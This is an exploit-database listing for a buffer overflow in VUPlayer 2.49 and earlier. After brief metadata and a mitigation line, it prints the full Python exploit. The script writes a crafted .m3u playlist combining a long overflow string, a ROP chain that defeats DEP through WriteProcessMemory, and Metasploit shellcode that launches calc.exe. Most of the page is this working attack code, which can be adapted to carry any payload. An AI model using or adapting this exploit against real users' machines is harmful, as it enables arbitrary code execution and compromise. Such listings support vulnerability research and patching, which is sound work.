header-logo
Suggest Exploit
vendor:
VUPlayer
by:
mr_me
7.5
CVSS
HIGH
Buffer Overflow
Unknown
CWE
Product Name: VUPlayer
Affected Version From: 2.49 and earlier
Affected Version To: 2.49 and earlier
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
Unknown

VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass

This exploit takes advantage of a buffer overflow vulnerability in VUPlayer version 2.49 and earlier. The exploit allows an attacker to execute arbitrary code with the permissions of the user running the vulnerable software. The exploit includes a shellcode payload that opens the Windows calculator application (calc.exe).

Mitigation:

Upgrade to a patched version of VUPlayer (2.50 or later).
Source

Exploit-DB raw data:

#!/usr/bin/env python
#
# VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass
# Author: mr_me
# Download: http://vuplayer.com/
# Tested on Wind0ws XP SP3 /noexecute=alwayson
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# 
# DEP AlwaysOn bypass version
# Thanks to Sud0 & Lincoln, for the motivation to learn this :-)
# 

# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");

crash = "HTTP://" + "\x41" * 1005

rop = "\xd3\x72\x60\x10" # POPAD # JE SHORT BASSMIDI.10607337		: 0x106072D3 
rop += "\x2f\x10\x60\x10" # POP EDI # MOV EAX,ESI # POP ESI # RETN	: 0x1060102F
rop += "\x13\x22\x80\x7c" # @ of WriteProcessMemory()				: 0x7C802213
rop += "\xcf\x22\x80\x7c" # Address to patched in kernel32			: 0x7C8022CF
rop += "\x44\x44\x44\x44" # JUNK									: 0x44444444
rop += "\xff\xff\xff\xff" # start @ -1 for shellcode size			: 0xffffffff
rop += "\x15\x10\x10\x10" # This @ from .data segment of app dll	: 0x10101015 
rop += "\x44\x44\x44\x44" # JUNK									: 0x44444444
rop += "\x44\x44\x44\x44" # JUNK									: 0x44444444
rop += "\x44\x44\x44\x44" # JUNK									: 0x44444444
rop += "\x79\x21\x60\x10" # POP EDI # POP ESI # RETN				: 0x10602179
rop += "\x88\x71\x60\x10" # CALL EAX								: 0x10607188
rop += "\xff\xff\xff\xff" # -hProcess argv[1]						: 0xffffffff

# Get the length of shellcode - @ from kernel32
rop += "\x6f\x10\x81\x7c" * 305 # INC EBX # RETN					: 0x7C81106F

# push all args on the stack for WPM() - @ from shell32.dll
rop += "\xf9\x18\xa1\x7c" # PUSHAD # RETN							: 0x7CA118F9

buffer = crash + rop + sc

print "[+] Building .m3u file"
file = open('cst-vuplayer.m3u','w');
file.write(buffer);
file.close();
print "[+] Done"

Navigation

Suggest Exploit

Services By CQR